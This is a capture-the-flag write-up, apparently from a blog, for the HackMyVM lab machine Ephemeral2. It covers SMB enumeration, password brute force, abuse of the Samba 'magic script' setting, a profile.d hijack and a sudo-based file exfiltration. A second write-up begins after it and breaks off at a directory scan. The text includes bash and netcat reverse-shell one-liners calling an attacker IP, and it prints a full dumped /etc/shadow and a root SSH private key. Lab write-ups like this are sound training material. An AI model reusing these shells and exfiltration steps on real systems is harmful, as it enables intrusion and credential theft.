        WORKGROUP       <00> - <GROUP> B <ACTIVE>  Domain/Workgroup Name
        WORKGROUP       <1d> -         B <ACTIVE>  Master Browser
        WORKGROUP       <1e> - <GROUP> B <ACTIVE>  Browser Service Elections

        MAC Address = 00-00-00-00-00-00

 ===================================( Session Check on 192.168.0.102 )=================================== 
                                                     
                                                     
[+] Server 192.168.0.102 allows sessions using username '', password ''                                   
                                                     
                                                     
 ================================( Getting domain SID for 192.168.0.102 )================================ 
                                                     
Domain Name: WORKGROUP                               
Domain Sid: (NULL SID)

[+] Can't determine if host is part of domain or part of a workgroup                                      
                                                     
                                                     
 ==================================( OS information on 192.168.0.102 )==================================  
                                                     
                                                     
[E] Can't get OS info with smbclient                 
                                                     
                                                     
[+] Got OS info for 192.168.0.102 from srvinfo:      
        EPHEMERAL      Wk Sv PrQ Unx NT SNT ephemeral server (Samba, Ubuntu)
        platform_id     :       500
        os version      :       6.1
        server type     :       0x809a03


 =======================================( Users on 192.168.0.102 )======================================= 
                                                     
index: 0x1 RID: 0x3e9 acb: 0x00000010 Account: randyName: randy      Desc: 

user:[randy] rid:[0x3e9]

 =================================( Share Enumeration on 192.168.0.102 )================================= 
                                                     
smbXcli_negprot_smb1_done: No compatible protocol selected by server.

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        SYSADMIN        Disk      
        IPC$            IPC       IPC Service (ephemeral server (Samba, Ubuntu))
        Officejet_Pro_8600_CDECA1_ Printer   
Reconnecting with SMB1 for workgroup listing.
Protocol negotiation to server 192.168.0.102 (for a protocol between LANMAN1 and NT1) failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available

[+] Attempting to map shares on 192.168.0.102        
                                                     
//192.168.0.102/print$  Mapping: DENIED Listing: N/A Writing: N/A                                         
//192.168.0.102/SYSADMIN        Mapping: DENIED Listing: N/A Writing: N/A                                 

[E] Can't understand response:                       
                                                     
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*           
//192.168.0.102/IPC$    Mapping: N/A Listing: N/A Writing: N/A                                            
//192.168.0.102/Officejet_Pro_8600_CDECA1_      Mapping: DENIED Listing: N/A Writing: N/A                 

 ===========================( Password Policy Information for 192.168.0.102 )===========================  
                                                     
                                                     

[+] Attaching to 192.168.0.102 using a NULL share

[+] Trying protocol 139/SMB...

[+] Found domain(s):

        [+] EPHEMERAL
        [+] Builtin

[+] Password Info for Domain: EPHEMERAL

        [+] Minimum password length: 5
        [+] Password history length: None
        [+] Maximum password age: 37 days 6 hours 21 minutes 
        [+] Password Complexity Flags: 000000

                [+] Domain Refuse Password Change: 0
                [+] Domain Password Store Cleartext: 0
                [+] Domain Password Lockout Admins: 0
                [+] Domain Password No Clear Change: 0
                [+] Domain Password No Anon Change: 0
                [+] Domain Password Complex: 0

        [+] Minimum password age: None
        [+] Reset Account Lockout Counter: 30 minutes 
        [+] Locked Account Duration: 30 minutes 
        [+] Account Lockout Threshold: None
        [+] Forced Log off Time: 37 days 6 hours 21 minutes 



[+] Retieved partial password policy with rpcclient: 
                                                     
                                                     
Password Complexity: Disabled                        
Minimum Password Length: 5


 ======================================( Groups on 192.168.0.102 )======================================  
                                                     
                                                     
[+] Getting builtin groups:                          
                                                     
                                                     
[+]  Getting builtin group memberships:              
                                                     
                                                     
[+]  Getting local groups:                           
                                                     
                                                     
[+]  Getting local group memberships:                
                                                     
                                                     
[+]  Getting domain groups:                          
                                                     
                                                     
[+]  Getting domain group memberships:               
                                                     
                                                     
 ==================( Users on 192.168.0.102 via RID cycling (RIDS: 500-550,1000-1050) )================== 
                                                     
                                                     
[I] Found new SID:                                   
S-1-22-1                                             

[I] Found new SID:                                   
S-1-5-32                                             

[I] Found new SID:                                   
S-1-5-32                                             

[I] Found new SID:                                   
S-1-5-32                                             

[I] Found new SID:                                   
S-1-5-32                                             

[+] Enumerating users using SID S-1-5-21-1796334311-1091253459-1090880117 and logon username '', password ''                                                   
                                                     
S-1-5-21-1796334311-1091253459-1090880117-501 EPHEMERAL\nobody (Local User)
S-1-5-21-1796334311-1091253459-1090880117-513 EPHEMERAL\None (Domain Group)
S-1-5-21-1796334311-1091253459-1090880117-1001 EPHEMERAL\randy (Local User)

[+] Enumerating users using SID S-1-5-32 and logon username '', password ''                               
                                                     
S-1-5-32-544 BUILTIN\Administrators (Local Group)    
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)

[+] Enumerating users using SID S-1-22-1 and logon username '', password ''                               
                                                     
S-1-22-1-1000 Unix User\randy (Local User)           
S-1-22-1-1001 Unix User\ralph (Local User)

 ===============================( Getting printer info for 192.168.0.102 )=============================== 
                                                     
        flags:[0x800000]                             
        name:[\\192.168.0.102\Officejet_Pro_8600_CDECA1_]
        description:[\\192.168.0.102\Officejet_Pro_8600_CDECA1_,,]
        comment:[]



enum4linux complete on Tue Jan 13 11:21:56 2026

smb爆破

crackmapexec smb 192.168.0.102 -u users.txt -p /usr/share/wordlists/rockyou.txt

randy   pogiako
ralph   admin

smb连接

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# smbclient //192.168.0.102/SYSADMIN -U randy
Password for [WORKGROUP\randy]:
Try "help" to get a list of possible commands.

smb: \> ls
  .                                   D        0  Sun Apr 10 21:13:45 2022
  ..                                  D        0  Sun Apr 10 20:36:23 2022
  reminder.txt                        N      193  Sun Apr 10 20:59:06 2022
  smb.conf                            N     9097  Sat Apr  9 16:32:20 2022
  help.txt                            N     4663  Sun Apr 10 20:59:43 2022

                8704372 blocks of size 1024. 0 blocks available
smb: \> get reminder.txt 
getting file \reminder.txt of size 193 as reminder.txt (26.9 KiloBytes/sec) (average 26.9 KiloBytes/sec)
smb: \> get smb.conf 
getting file \smb.conf of size 9097 as smb.conf (201.9 KiloBytes/sec) (average 177.9 KiloBytes/sec)
smb: \> get help.txt 
getting file \help.txt of size 4663 as help.txt (650.5 KiloBytes/sec) (average 234.9 KiloBytes/sec)
smb: \>

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# ls
help.txt  reminder.txt  smb.conf  
                                                                                                            
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# cat help.txt    
8. Accessing an SMB Share With Linux Machines
Linux (UNIX) machines can also browse and mount SMB shares. Note that this can be done whether the server is a Windows machine or a Samba server!

An SMB client program for UNIX machines is included with the Samba distribution. It provides an ftp-like interface on the command line. You can use this utility to transfer files between a Windows 'server' and a Linux client.

Most Linux distributions also now include the useful smbfs package, which allows one to mount and umount SMB shares. More on smbfs below.

To see which shares are available on a given host, run:

    /usr/bin/smbclient -L host
where 'host' is the name of the machine that you wish to view. this will return a list of 'service' names - that is, names of drives or printers that it can share with you. Unless the SMB server has no security configured, it will ask you for a password. Get it the password for the 'guest' account or for your personal account on that machine.

For example:

    smbclient -L zimmerman
The output of this command should look something like this:

Server time is Sat Aug 10 15:58:27 1996
Timezone is UTC+10.0
Password: 
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]

Server=[ZIMMERMAN] User=[] Workgroup=[WORKGROUP] Domain=[]

        Sharename      Type      Comment
        ---------      ----      -------
        ADMIN$         Disk      Remote Admin
        public         Disk      Public 
        C$             Disk      Default share
        IPC$           IPC       Remote IPC
        OReilly        Printer   OReilly
        print$         Disk      Printer Drivers


This machine has a browse list:

        Server               Comment
        ---------            -------
        HOPPER               Samba 1.9.15p8
        KERNIGAN             Samba 1.9.15p8
        LOVELACE             Samba 1.9.15p8
        RITCHIE              Samba 1.9.15p8
        ZIMMERMAN            
The browse list shows other SMB servers with resources to share on the network.

To use the client, run:

    /usr/bin/smbclient service <password>
where 'service' is a machine and share name. For example, if you are trying to reach a directory that has been shared as 'public' on a machine called zimmerman, the service would be called \\zimmerman\public. However, due to shell restrictions, you will need to escape the backslashes, so you end up with something like this:

    /usr/bin/smbclient \\\\zimmerman\\public mypasswd
where 'mypasswd' is the literal string of your password.

You will get the smbclient prompt:

Server time is Sat Aug 10 15:58:44 1996
Timezone is UTC+10.0
Domain=[WORKGROUP] OS=[Windows NT 3.51] Server=[NT LAN Manager 3.51]
smb: \> 
Type 'h' to get help using smbclient:

smb: \> h
ls             dir            lcd            cd             pwd            
get            mget           put            mput           rename         
more           mask           del            rm             mkdir          
md             rmdir          rd             prompt         recurse        
translate      lowercase      print          printmode      queue          
cancel         stat           quit           q              exit           
newer          archive        tar            blocksize      tarmode        
setmode        help           ?              !              
smb: \> 
If you can use ftp, you shouldn't need the man pages for smbclient.

Although you can use smbclient for testing, you will soon tire of it for real work. For that you will probably want to use the smbfs package. Smbfs comes with two simple utilties, smbmount and smbumount. They work just like mount and umount for SMB shares.

One important thing to note: You must have smbfs support compiled into your kernel to use these utilities!

The following shows a typical use of smbmount to mount an SMB share called "customers" from a machine called "samba1":

[root@postel]# smbmount "\\\\samba1\\customers" -U rtg2t -c 'mount /customers -u 500 -g 100'
Added interface ip=192.168.35.84 bcast=192.168.255.255 nmask=255.255.0.0
Got a positive name query response from 192.168.168.158 ( 192.168.168.158 )
Server time is Tue Oct  5 10:27:36 1999
Timezone is UTC-4.0
Password:
Domain=[IPM] OS=[Unix] Server=[Samba 2.0.3]
security=user
Issuing a mount command will now show the share mounted, just as if it were an NFS export:

[root@postel]# mount                                                                                                    
/dev/hda2 on / type ext2 (rw)
none on /proc type proc (rw)
none on /dev/pts type devpts (rw,mode=622)
//SAMBA1/CUSTOMERS on /customers type smbfs (0)
                                                                                                            
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# cat reminder.txt 
Hey randy! I just set up smb like you asked me too. I left a file for you if you ever need help accessing your smb share.
For now all your shares are going to be under [SYSADMIN]

Thank You.


                                                                                                            
┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# cat smb.conf    
#
# Sample configuration file for the Samba suite for Debian GNU/Linux.
#
#
# This is the main Samba configuration file. You should read the
# smb.conf(5) manual page in order to understand the options listed
# here. Samba has a huge number of configurable options most of which 
# are not shown in this example
#
# Some options that are often worth tuning have been included as
# commented-out examples in this file.
#  - When such options are commented with ";", the proposed setting
#    differs from the default Samba behaviour
#  - When commented with "#", the proposed setting is the default
#    behaviour of Samba but the option is considered important
#    enough to be mentioned here
#
# NOTE: Whenever you modify this file you should run the command
# "testparm" to check that you have not made any basic syntactic 
# errors. 

#======================= Global Settings =======================

[global]

## Browsing/Identification ###

# Change this to the workgroup/NT-domain name your Samba server will part of
   workgroup = WORKGROUP

# server string is the equivalent of the NT Description field
   server string = %h server (Samba, Ubuntu)

#### Networking ####

# The specific set of interfaces / networks to bind to
# This can be either the interface name or an IP address/netmask;
# interface names are normally preferred
;   interfaces = 127.0.0.0/8 eth0

# Only bind to the named interfaces and/or networks; you must use the
# 'interfaces' option above to use this.
# It is recommended that you enable this feature if your Samba machine is
# not protected by a firewall or is a firewall itself.  However, this
# option cannot handle dynamic or non-broadcast interfaces correctly.
;   bind interfaces only = yes



#### Debugging/Accounting ####

# This tells Samba to use a separate log file for each machine
# that connects
   log file = /var/log/samba/log.%m

# Cap the size of the individual log files (in KiB).
   max log size = 1000

# We want Samba to only log to /var/log/samba/log.{smbd,nmbd}.
# Append syslog@1 if you want important messages to be sent to syslog too.
   logging = file

# Do something sensible when Samba crashes: mail the admin a backtrace
   panic action = /usr/share/samba/panic-action %d


####### Authentication #######

# Server role. Defines in which mode Samba will operate. Possible
# values are "standalone server", "member server", "classic primary
# domain controller", "classic backup domain controller", "active
# directory domain controller". 
#
# Most people will want "standalone server" or "member server".
# Running as "active directory domain controller" will require first
# running "samba-tool domain provision" to wipe databases and create a
# new domain.
   server role = standalone server

   obey pam restrictions = yes

# This boolean parameter controls whether Samba attempts to sync the Unix
# password with the SMB password when the encrypted SMB password in the
# passdb is changed.
   unix password sync = yes

# For Unix password sync to work on a Debian GNU/Linux system, the following
# parameters must be set (thanks to Ian Kahan <<kahan@informatik.tu-muenchen.de> for
# sending the correct chat script for the passwd program in Debian Sarge).
   passwd program = /usr/bin/passwd %u
   passwd chat = *Enter\snew\s*\spassword:* %n\n *Retype\snew\s*\spassword:* %n\n *password\supdated\ssuccessfully* .

# This boolean controls whether PAM will be used for password changes
# when requested by an SMB client instead of the program listed in
# 'passwd program'. The default is 'no'.
   pam password change = yes

# This option controls how unsuccessful authentication attempts are mapped
# to anonymous connections
   map to guest = bad user

########## Domains ###########

#
# The following settings only takes effect if 'server role = primary
# classic domain controller', 'server role = backup domain controller'
# or 'domain logons' is set 
#

# It specifies the location of the user's
# profile directory from the client point of view) The following
# required a [profiles] share to be setup on the samba server (see
# below)
;   logon path = \\%N\profiles\%U
# Another common choice is storing the profile in the user's home directory
# (this is Samba's default)
#   logon path = \\%N\%U\profile

# The following setting only takes effect if 'domain logons' is set
# It specifies the location of a user's home directory (from the client
# point of view)
;   logon drive = H:
#   logon home = \\%N\%U

# The following setting only takes effect if 'domain logons' is set
# It specifies the script to run during logon. The script must be stored
# in the [netlogon] share
# NOTE: Must be store in 'DOS' file format convention
;   logon script = logon.cmd

# This allows Unix users to be created on the domain controller via the SAMR
# RPC pipe.  The example command creates a user account with a disabled Unix
# password; please adapt to your needs
; add user script = /usr/sbin/adduser --quiet --disabled-password --gecos "" %u

# This allows machine accounts to be created on the domain controller via the 
# SAMR RPC pipe.  
# The following assumes a "machines" group exists on the system
; add machine script  = /usr/sbin/useradd -g machines -c "%u machine account" -d /var/lib/samba -s /bin/false %u

# This allows Unix groups to be created on the domain controller via the SAMR
# RPC pipe.  
; add group script = /usr/sbin/addgroup --force-badname %g

############ Misc ############

# Using the following line enables you to customise your configuration
# on a per machine basis. The %m gets replaced with the netbios name
# of the machine that is connecting
;   include = /home/samba/etc/smb.conf.%m

# Some defaults for winbind (make sure you're not using the ranges
# for something else.)
;   idmap config * :              backend = tdb
;   idmap config * :              range   = 3000-7999
;   idmap config YOURDOMAINHERE : backend = tdb
;   idmap config YOURDOMAINHERE : range   = 100000-999999
;   template shell = /bin/bash

# Setup usershare options to enable non-root users to share folders
# with the net usershare command.

# Maximum number of usershare. 0 means that usershare is disabled.
#   usershare max shares = 100

# Allow users who've been granted usershare privileges to create
# public shares, not just authenticated ones
   usershare allow guests = yes

#======================= Share Definitions =======================

# Un-comment the following (and tweak the other settings below to suit)
# to enable the default home directory shares. This will share each
# user's home directory as \\server\username
;[homes]
;   comment = Home Directories
;   browseable = no

# By default, the home directories are exported read-only. Change the
# next parameter to 'no' if you want to be able to write to them.
;   read only = yes

# File creation mask is set to 0700 for security reasons. If you want to
# create files with group=rw permissions, set next parameter to 0775.
;   create mask = 0700

# Directory creation mask is set to 0700 for security reasons. If you want to
# create dirs. with group=rw permissions, set next parameter to 0775.
;   directory mask = 0700

# By default, \\server\username shares can be connected to by anyone
# with access to the samba server.
# Un-comment the following parameter to make sure that only "username"
# can connect to \\server\username
# This might need tweaking when using external authentication schemes
;   valid users = %S

# Un-comment the following and create the netlogon directory for Domain Logons
# (you need to configure Samba to act as a domain controller too.)
;[netlogon]
;   comment = Network Logon Service
;   path = /home/samba/netlogon
;   guest ok = yes
;   read only = yes

# Un-comment the following and create the profiles directory to store
# users profiles (see the "logon path" option above)
# (you need to configure Samba to act as a domain controller too.)
# The path below should be writable by all users so that their
# profile directory may be created the first time they log on
;[profiles]
;   comment = Users profiles
;   path = /home/samba/profiles
;   guest ok = no
;   browseable = no
;   create mask = 0600
;   directory mask = 0700

[printers]
   comment = All Printers
   browseable = no
   path = /var/spool/samba
   printable = yes
   guest ok = no
   read only = yes
   create mask = 0700

# Windows clients look for this share name as a source of downloadable
# printer drivers
[print$]
   comment = Printer Drivers
   path = /var/lib/samba/printers
   browseable = yes
   read only = yes
   guest ok = no
# Uncomment to allow remote administration of Windows print drivers.
# You may need to replace 'lpadmin' with the name of the group your
# admin users are members of.
# Please note that you also need to set appropriate Unix permissions
# to the drivers directory for these users to have write rights in it
;   write list = root, @lpadmin

[SYSADMIN]

path = /home/randy/smbshare
valid users = randy
browsable = yes
writeable = yes
read only = no
magic script = smbscript.elf
guest ok = no

[SYSADMIN]

path = /home/randy/smbshare
valid users = randy
browsable = yes
writeable = yes
read only = no
magic script = smbscript.elf
guest ok = no

这意味着如果我们上传一个名为smbscript.elf的文件，当该文件被写入到共享目录时，Samba服务器可能会尝试执行它

卡在这里了，没招了，应该是我跑字典爆破smb端口给靶机磁盘干崩了，空间不够，没办法写东西了

步骤一：通过挂载点上传一个反向shell脚本，但使用其他名字（例如，rev.elf）。
步骤二：通过smbclient重命名该文件为smbscript.elf。
步骤三：通过smbclient执行ls命令来触发magic script。

cat > rev.elf << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/192.168.0.106/4444 0>&1
EOF
chmod +x rev.elf
sudo cp rev.elf /mnt/smb_test/

smbclient //192.168.0.100/SYSADMIN -U randy%pogiako -c 'rename rev.elf smbscript.elf'

提权

提权-ralph

randy/pogiako

上传linpeas.sh脚本进行扫描

发现我们对/etc/profile.d具有写入权限

(remote) randy@ephemeral:/etc/profile.d$ cat /home/ralph/tools/ssh.sh 
#!/bin/bash


/usr/bin/ssh -o "StrictHostKeyChecking no" ralph@localhost -i /home/ralph/.ssh/id_rsa

vi /etc/profile.d/last.sh
#!/bin/bash
rm /tmp/g;mkfifo /tmp/g;cat /tmp/g|sh -i 2>&1|nc 192.168.0.106 7777 >/tmp/g

chmod +x /etc/profile.d/last.sh

提权-root

(remote) ralph@ephemeral:/home/ralph$ ls
getfile.py  tools  user.txt
(remote) ralph@ephemeral:/home/ralph$ cat user.txt 
0041e0826ce1e1d6da9e9371a8bb3bde

(remote) ralph@ephemeral:/home/ralph$ sudo -l
Matching Defaults entries for ralph on ephemeral:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User ralph may run the following commands on
        ephemeral:
    (root) NOPASSWD: /usr/bin/python3
        /home/ralph/getfile.py

ralph@ephemeral:~$ sudo -u root /usr/bin/python3 /home/ralph/getfile.py

File path: /etc/shadow 
IP address: 192.168.0.106

File /etc/shadow sent to 192.168.0.106


--2026-01-13 12:14:38--  http://192.168.0.106/
Connecting to 192.168.0.106:80... connected.
HTTP request sent, awaiting response..

┌──(web)─(root㉿kali)-[/home/kali]
└─# nc -lvvp 80                               
listening on [any] 80 ...
connect to [192.168.0.106] from mail.codeshield.hmv [192.168.0.100] 56134
POST / HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 192.168.0.106
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 1751

root:$6$ONBXfYmDyD2.uHR2$b8FgiI/1JXkRDB1noB5b3fObAXL3tbZj8QrUxpbmqcw99A17fIVY.6SZM2TrBY0WT1XY0n1T0ZNlx/XKfQNqh/:19092:0:99999:7:::
daemon:*:19046:0:99999:7:::
bin:*:19046:0:99999:7:::
sys:*:19046:0:99999:7:::
sync:*:19046:0:99999:7:::
games:*:19046:0:99999:7:::
man:*:19046:0:99999:7:::
lp:*:19046:0:99999:7:::
mail:*:19046:0:99999:7:::
news:*:19046:0:99999:7:::
uucp:*:19046:0:99999:7:::
proxy:*:19046:0:99999:7:::
www-data:*:19046:0:99999:7:::
backup:*:19046:0:99999:7:::
list:*:19046:0:99999:7:::
irc:*:19046:0:99999:7:::
gnats:*:19046:0:99999:7:::
nobody:*:19046:0:99999:7:::
systemd-network:*:19046:0:99999:7:::
systemd-resolve:*:19046:0:99999:7:::
systemd-timesync:*:19046:0:99999:7:::
messagebus:*:19046:0:99999:7:::
syslog:*:19046:0:99999:7:::
_apt:*:19046:0:99999:7:::
tss:*:19046:0:99999:7:::
uuidd:*:19046:0:99999:7:::
tcpdump:*:19046:0:99999:7:::
avahi-autoipd:*:19046:0:99999:7:::
usbmux:*:19046:0:99999:7:::
rtkit:*:19046:0:99999:7:::
dnsmasq:*:19046:0:99999:7:::
cups-pk-helper:*:19046:0:99999:7:::
speech-dispatcher:!:19046:0:99999:7:::
avahi:*:19046:0:99999:7:::
kernoops:*:19046:0:99999:7:::
saned:*:19046:0:99999:7:::
nm-openvpn:*:19046:0:99999:7:::
hplip:*:19046:0:99999:7:::
whoopsie:*:19046:0:99999:7:::
colord:*:19046:0:99999:7:::
geoclue:*:19046:0:99999:7:::
pulse:*:19046:0:99999:7:::
gnome-initial-setup:*:19046:0:99999:7:::
gdm:*:19046:0:99999:7:::
sssd:*:19046:0:99999:7:::
randy:$6$umc2qGGAsuxy4nTr$KGX0WfHCcQwNONY0MzThp6jhh8Y7iWhBb7IdFxVyutTcQJwQXzEYVXKi1PU5RPtr4SQziby6wOIqzayzBIPre.:19092:0:99999:7:::
systemd-coredump:!!:19090::::::
ralph:$6$H19Vgg5dcaicaNfZ$yBNxkgPYn9.sCw.Kiua/zYlNvQbiLP91QHu7REiHeDAyxsaxG4SBcuFkTikMjPab6f7X.13DyllNg9t88uCvp1:19092:0:99999:7:::
sshd:*:19091:0:99999:7:::
mysql:!:19092:0:99999:7:::

(remote) ralph@ephemeral:/home/ralph$ sudo -u root /usr/bin/python3 /home/ralph/getfile.py
File path: /root/.ssh/id_rsa
IP address: 192.168.0.106

File /root/.ssh/id_rsa sent to 192.168.0.106


--2026-01-13 12:18:36--  http://192.168.0.106/
Connecting to 192.168.0.106:80... 


┌──(web)─(root㉿kali)-[/home/kali]
└─# nc -lvvp 80
listening on [any] 80 ...
connect to [192.168.0.106] from mail.codeshield.hmv [192.168.0.100] 56136
POST / HTTP/1.1
User-Agent: Wget/1.20.3 (linux-gnu)
Accept: */*
Accept-Encoding: identity
Host: 192.168.0.106
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 2602

-----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----

vi root
chmod 600 root 


┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# ssh -T root@192.168.0.100 -i root "bash -i"
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@ephemeral:~# cd roottxt    
cd roottxt
root@ephemeral:~/roottxt# ls
ls
root.txt
root@ephemeral:~/roottxt# cat root.txt
cat root.txt
16c760c8c08bf9dd3363355ab77ef8da

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/ephemeral2/

HMV-Ephemeral3

呼啸山庄 — Wed, 14 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali]
└─# arp-scan -l | grep "08:00:27"
WARNING: Cannot open MAC/Vendor file ieee-oui.txt: Permission denied
WARNING: Cannot open MAC/Vendor file mac-vendor.txt: Permission denied
192.168.0.101   08:00:27:f0:38:e6       (Unknown)

nmap扫描

┌──(web)─(root㉿kali)-[/home/kali]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-14 04:46 EST
Nmap scan report for 192.168.0.101
Host is up (0.00069s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 f0:f2:b8:e0:da:41:9b:96:3b:b6:2b:98:95:4c:67:60 (RSA)
|   256 a8:cd:e7:a7:0e:ce:62:86:35:96:02:43:9e:3e:9a:80 (ECDSA)
|_  256 14:a7:57:a9:09:1a:7e:7e:ce:1e:91:f3:b1:1d:1b:fd (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.33 seconds

80端口

目录扫描

gobuster dir -u http://192.168.0.101 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64

==============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.101
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              zip,db,bak,js,yaml,php,txt,html
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
